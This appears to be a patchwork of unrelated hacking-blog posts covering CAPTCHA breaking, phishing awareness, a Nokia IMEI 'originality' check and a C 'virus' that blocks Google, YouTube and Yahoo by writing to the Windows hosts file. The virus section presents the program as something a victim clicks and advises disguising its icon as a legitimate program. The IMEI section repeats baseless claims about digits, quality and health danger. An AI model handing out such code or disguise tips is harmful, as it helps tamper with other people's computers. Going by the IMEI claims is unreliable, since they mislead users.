Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer. 
 

Breaking the CAPTCHA

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.

How to Identify and Avoid Phishing Scams

Phishing is a form of social engineering technique used by hackers to gather sensitive information such as usernames, passwords and credit card details by posing as a trustworty person/organization. Since most online users are unaware of the techniques used in carrying out a phishing attack, they often fall victims and hence, phishing can be very effective.
With the dramatic increase in the number of phishing scams in the recent years, there has also been a steady rise in the number of people being victimized. Lack of awareness among the people is the prime reason behind such attacks. This article will try to create awareness and educate the users about such online scams and frauds.
Phishing scams usually sends an email message to users requesting for their personal information, or redirects them to a website where they are required to enter thier personal information. Here are some of the tips that can be used to identify various phishing techniques and stay away from it.
 

Identifying a Phishing Scam

 
1. Beware of emails that demand for an urgent response from your side. Some of the examples are:
  • You may receive an email which appears to have come from your bank or financial organization stating that “your bank account is limited due to an unauthorized activity. Please verify your account asap so as to avoid permanant suspension”. In most cases, you are requested to follow a link (URL) that takes you to spoofed webpage (similar to your bank website) and enter your login details over there.
  • In some cases, phishing emails may ask you to make a phone call. There may be a person or an audio response waiting on the other side of the phone to take away your credit cards details, account number, social security number or other valuable data.
2. Phishing emails are generally not personalized. Since they target a lagre number of online users, they usually use generalized texts like “Dear valued customer”, “Dear Paypal user” etc. to address you. However, some phishing emails can be an exception to this rule.
3. When you click on the links contained in a phishing email, you will most likely be taken to a spoofed webpage with official logos and information that looks exactly same as that of the original webpages of your bank or financial organization. Pay attention to the URL of a website before you enter any of your personal information over there. Even though malicious websites look identical to the legitimate site, it often uses a different domain or variation in the spelling. For example, instead of paypal.com, a phishing website may use different addresses such as:
  • papyal.com
  • paypal.org
  • verify-paypal.com
  • xyz.com/paypal/verify-account/
 

Tips to Avoid Being a Victim of Phishing

 
1. Do not respond to suspicious emails that ask you to give your personal information. If you are unsure whether an email request is legitimate, verify the same by calling the respective bank/company. Always use the telephone numbers printed on your bank records or statements and not those mentioned in the suspicious email.
2. Don’t use the links in an email, instant messenger or chat conversation to enter a website. Instead, always type the URL of the website on your browser’s address bar to get into a website.
3. Legitimate websites always use a secure connection (https://) on those pages which are intended to gather sensitive data such as usernames and passwords, account numbers or credic card details. You will see a lock icon Picture of the Lock icon in your browser’s address bar which indicates a secure connection. On some websites like paypal.com which uses an extended validation certificate, the address bar turns GREEN

Is your Nokia Cell Phone Original

Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of it’s originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.
Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers
Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality
IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality
IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good
IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality
IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

his virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?


Here is the sourcecode of the virus.
---------------------------------------------------------------------------------------------------------
#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
---------------------------------------------------------------------------------------------------------------

Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program